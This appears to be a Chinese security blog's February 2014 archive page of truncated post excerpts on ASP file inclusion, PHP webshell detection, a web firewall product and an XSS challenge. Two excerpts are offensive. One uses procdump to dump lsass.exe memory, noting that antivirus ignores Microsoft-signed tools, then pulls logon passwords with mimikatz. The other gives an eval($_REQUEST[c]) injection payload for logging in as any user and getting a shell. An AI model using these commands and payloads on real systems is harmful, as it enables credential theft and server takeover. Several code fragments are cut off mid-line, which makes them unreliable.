02 2014 档案
摘要:author: bin与include的区别,它可以动态包含文件。被包含文件里面可执行ASP代码,在国外的源码中有使用的。include.asp?file=./1.txt1.txt
阅读全文
摘要:"; if( strpos($decode,'eval(gzinflate(base64_decode') !== false ) { preg_match("/(?'.$decode.''); }}
阅读全文
摘要:使用procdump,由于是微软的东西,带微软签名杀软不会报毒。procdump -accepteula -ma lsass.exe lsass.dmpcopy出 lsass.dmp到本机。mimikatz # sekurlsa::minidump lsass.dmpSwitch to MINIDUMPmimikatz # sekurlsa::logonPasswords具体可以参考原文:http://blog.gentilkiwi.com/securite/mimikatz/minidump
阅读全文
摘要:“Safe3 Web Application Firewall"是国内安全组织保护伞网络基于新一代Web安全技术开发的全方位企业Web信息安全产品。能有效扫描各种WebShell,同时也可以抵御各种Web攻击。运行环境:该软件能运行在 Windows 2000/2003/2008 下,支持 IIS5/IIS6/IIS7.x/IIS8.x软件需要系统安装.net framework 2.0,http://www.crsky.com/soft/4818.html软件主要功能:流量控制:当前网络P2P软件泛滥成灾,多线程下载(如迅雷等)造成网站仅有的带宽资源严重枯竭,不仅影响了网站的正常浏
阅读全文
摘要:0x00 起因这期 XSS 挑战的起因是在阅读“Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters”过后,在其中发现了一个很有趣的话题。那就是在圆括号被过滤的情况下,如何去执行javascript。在文中笔者给出来了这样的解决方 案:这是一个通过抛出异常的方式来执行 alert()的方案。那么,还有没有别的办法可以让我们在没有圆括号的情况下执行Javascript呢?众神们经常说,没有具体环境的讨论是没有意义 的。所以我就花了一点时间,编写了一个基于黑名单的XSS防御代码。也就有了我们这次的挑战。0
阅读全文
摘要:https://sb\');eval(\$_REQUEST[c]);#').'"';#登录任意用户直接访问url即可,getshell可以curl或者用其他工具post提交function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16
阅读全文